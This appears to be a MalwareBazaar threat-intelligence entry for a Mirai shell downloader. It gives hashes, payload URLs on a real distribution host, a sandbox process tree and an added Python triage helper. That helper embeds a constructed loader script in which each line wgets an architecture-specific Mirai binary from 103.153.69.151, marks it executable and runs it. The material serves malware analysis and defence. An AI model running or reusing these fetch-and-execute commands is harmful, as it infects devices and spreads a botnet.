MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 7

SHA256 hash: 8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99
SHA3-384 hash: a3967e91bf0f32cbae7aec51079302864323bbe66f52cae2bf1c58de22804256484d68c3302f98a957f28e4d43248d8f
SHA1 hash: cead00ccf627a2e37cdec395218444be3006dff9
MD5 hash: 514ce6a0b09eb9dd0703408c3d7273a9
humanhash: mars-lamp-april-tango
File name: toto.sh
Signature: Mirai
File size: 444 bytes
First seen: 2025-09-18 16:59:37 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 6:SFkYqtmRkYqiMkYq6NIl5GkYqSa0LKie3kY6IUkY8WT1kY9anIVn:HVVVi9V6NIl53VH0LKVUUFG6cVn
TLSH: T17CF0A08D36126F66880ECE42F6730AA85401EAD112A9CF8BF5D60CB65C9C580B0B6F45
Magika: shell
Reporter: abuse_ch
Tags: mirai sh

IOCs: payloads served from the same distribution host, one row per sample (URL, SHA256 of the fetched file, signature, tags):

URL                        | Malware sample (SHA256 hash)                                     | Signature | Tags
http://103.153.69.151/arm4 | 1b8c6487a37f507e54241cc60111ef4c03955448b44d18d4d0c776617419ad7a | Mirai     | elf mirai ua-wget
http://103.153.69.151/arm5 | f780dc09d326a38c0d712fea1243112d6148f81d323529bd726ffca0e8382805 | Mirai     | elf geofenced mirai ua-wget USA
http://103.153.69.151/arm6 | dd7ef996397753a979ec93c81eb09ebb653a52311fad9d277a2c6bada7045b18 | Mirai     | elf geofenced mirai ua-wget USA
http://103.153.69.151/arm7 | 8499db38a52efc4646eb70e5b1a1e6c4cdea4c4811bd255559303cc002ac3593 | Mirai     | elf geofenced mirai ua-wget USA
http://103.153.69.151/mips | 9bad584a9bcc3747c703d637720558a9f6389c636f7515c8e6cce8d31a91a8a2 | Mirai     | 32-bit elf mirai Mozi
http://103.153.69.151/mpsl | a974b7de7fff143231cceb4336d022192096f814e7512a7d246fef7235ccb606 | Mirai     | elf geofenced mips mirai ua-wget USA
http://103.153.69.151/x86  | 56fb720aa04bb923a80712cd690510c2c532e5cc3fe0e32868eb4097cc3132bf | Mirai     | 32-bit elf mirai Mozi

Intelligence

File Origin
Uploads: 1
Downloads: 42
Origin country: DE

Vendor Threat Intelligence

Verdict: Malicious
File type: text
First seen: 2025-09-18T15:18:00Z UTC
Last seen: 2025-09-18T15:18:00Z UTC
Hits: ~10
Detections: HEUR:Trojan-Downloader.Shell.Agent.a
Status: terminated
Behavior graph (process tree recovered from the sandbox graph export; pids as recorded):

/usr/bin/sudo (pid 3201)
  execve -> /tmp/sample.bin (pid 3208)
    execve -> /usr/bin/wget  (pid 3210)  net, send-data              133 B sent to 103.153.69.151:80
    execve -> /usr/bin/chmod (pid 3327)
    clone  -> /usr/bin/dash  (pid 3328)
    execve -> /usr/bin/wget  (pid 3329)  net, send-data, write-file  133 B sent to 103.153.69.151:80
    execve -> /usr/bin/chmod (pid 3483)
    clone  -> /usr/bin/dash  (pid 3485)
    execve -> /usr/bin/wget  (pid 3491)  net, send-data, write-file  133 B sent to 103.153.69.151:80
    execve -> /usr/bin/chmod (pid 3525)
    clone  -> /usr/bin/dash  (pid 3526)
    execve -> /usr/bin/wget  (pid 3530)  net, send-data, write-file  133 B sent to 103.153.69.151:80
    execve -> /usr/bin/chmod (pid 3679)
    clone  -> /usr/bin/dash  (pid 3680)
    execve -> /usr/bin/wget  (pid 3682)  net, send-data, write-file  133 B sent to 103.153.69.151:80

The repeating wget -> chmod -> dash triplet is the fetch, mark-executable, run loop of a stage-1 Mirai loader, one iteration per payload. Every wget contacted the same host that serves the payload URLs above, over plain HTTP on port 80, each sending 133 bytes (consistent with a single HTTP GET). The first wget (pid 3210) recorded no write-file, yet the chmod and dash that follow it still ran, which is typical of loaders that never check whether a download succeeded.
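A triage helper for loaders of this kind, added here as an example; it is not code from MalwareBazaar, from the reporter, or from the sample. The page does not show the contents of toto.sh, so the script text it parses is a constructed stand-in that assumes the conventional Mirai loader layout (one wget, chmod, execute line per architecture) and reuses the seven payload URLs from the IOC table; the regexes, the function names and the ARCH_NAMES mapping are the example's own.

```python
"""Triage helper for Mirai-style shell downloaders.

Added example, not code from MalwareBazaar, the reporter or the sample.
Given the text of a stage-1 loader script it extracts the IOCs a responder
wants (download URLs, contact hosts, dropped file names, CPU architectures
targeted) and flags the fetch -> chmod -> execute pattern that the sandbox
behaviour graph on this page records for toto.sh.
"""
import re
from urllib.parse import urlparse

# Constructed sample. This is NOT the real contents of toto.sh (the page does
# not show it); it assumes the conventional Mirai loader layout and reuses
# the seven payload URLs listed in the page's IOC table.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://103.153.69.151/arm4; chmod +x arm4; ./arm4 toto
wget http://103.153.69.151/arm5; chmod +x arm5; ./arm5 toto
wget http://103.153.69.151/arm6; chmod +x arm6; ./arm6 toto
wget http://103.153.69.151/arm7; chmod +x arm7; ./arm7 toto
wget http://103.153.69.151/mips; chmod +x mips; ./mips toto
wget http://103.153.69.151/mpsl; chmod +x mpsl; ./mpsl toto
wget http://103.153.69.151/x86; chmod +x x86; ./x86 toto
rm -rf arm4 arm5 arm6 arm7 mips mpsl x86
"""

# A harmless constructed script with a download but no chmod/execute step.
BENIGN_SCRIPT = "wget https://example.com/readme.txt\ncat readme.txt\n"

# Mirai build names -> CPU family (standard naming in Mirai-derived loaders;
# the payload table on this page uses exactly these paths).
ARCH_NAMES = {
    "arm4": "ARMv4", "arm5": "ARMv5", "arm6": "ARMv6", "arm7": "ARMv7",
    "mips": "MIPS (big-endian)", "mpsl": "MIPS (little-endian)",
    "x86": "x86 (32-bit)", "x86_64": "x86-64", "sh4": "SuperH",
    "ppc": "PowerPC", "m68k": "m68k", "spc": "SPARC", "arc": "ARC",
}

# wget/curl invocation: options before the URL, the URL, options after it.
# The character classes stop at ; | & so "wget URL; chmod ..." splits cleanly.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b([^\n;|&]*?)(https?://[^\s'\";|&]+)([^\n;|&]*)")
# chmod +x / chmod a+x / chmod 777 <name>
CHMOD_RE = re.compile(r"\bchmod\s+(?:[0-7]{3,4}|[ugoa]*\+x)\s+([^\s;|&]+)")
# ./<name> at line start or right after a shell separator
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./([^\s;|&]+)", re.MULTILINE)


def fetches(script: str) -> list[tuple[str, str]]:
    """(url, local file name) for every wget/curl download, in order."""
    out = []
    for m in FETCH_RE.finditer(script):
        opts, url = m.group(1) + m.group(3), m.group(2)
        rename = re.search(r"-[Oo]\s+(\S+)", opts)  # wget -O name / curl -o name
        name = rename.group(1) if rename else urlparse(url).path.rsplit("/", 1)[-1]
        out.append((url, name))
    return out


def extract_urls(script: str) -> list[str]:
    """Download URLs in order of appearance (duplicates kept)."""
    return [url for url, _ in fetches(script)]


def triage(script: str) -> dict:
    """Collect IOCs and decide whether the script acts as a stage-1 loader.

    'downloader' is True only when some fetched file is also chmod'ed and
    executed, i.e. all three steps seen in the behaviour graph are present.
    """
    got = fetches(script)
    urls = [u for u, _ in got]
    names = [n for _, n in got]
    hosts = sorted({h for h in (urlparse(u).hostname for u in urls) if h})
    chmodded = set(CHMOD_RE.findall(script))
    executed = set(EXEC_RE.findall(script))
    return {
        "urls": urls,
        "hosts": hosts,
        "dropped_files": sorted(set(names)),
        "architectures": sorted({ARCH_NAMES[n] for n in names if n in ARCH_NAMES}),
        "downloader": any(n in chmodded and n in executed for n in names),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

To use it on a real capture, read the script file into triage(): the hosts and URLs it returns are the block-list IOCs, the dropped file names are what to hunt for in /tmp, /var/run and similar writable paths, and the architecture list tells you which of the payload hashes in the IOC table to pull for the device classes in your fleet. The downloader flag deliberately requires all three steps, so a script that only fetches a text file (BENIGN_SCRIPT) is not flagged.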
Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent

Threat name: Linux.Worm.Mirai
Status: Malicious
First seen: 2025-09-18 17:02:14 UTC
File type: Text (Shell)
AV detection: 12 of 24 (50.00%)
Threat level: 5/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices
(These three are Win32 indicators from a Windows analysis environment. A 444-byte POSIX shell script cannot call SetWindowsHookEx or write the Windows registry, so they describe the sandbox, not this sample; the Linux process trace above is the behaviour to rely on.)
Please note that we are no longer able to provide a coverage score for VirusTotal.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method | Signature | File type | Malware sample (SHA256 hash)
Web download    | Mirai     | sh        | 8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99 (this sample)

Delivery method: Distributed via web download

Comments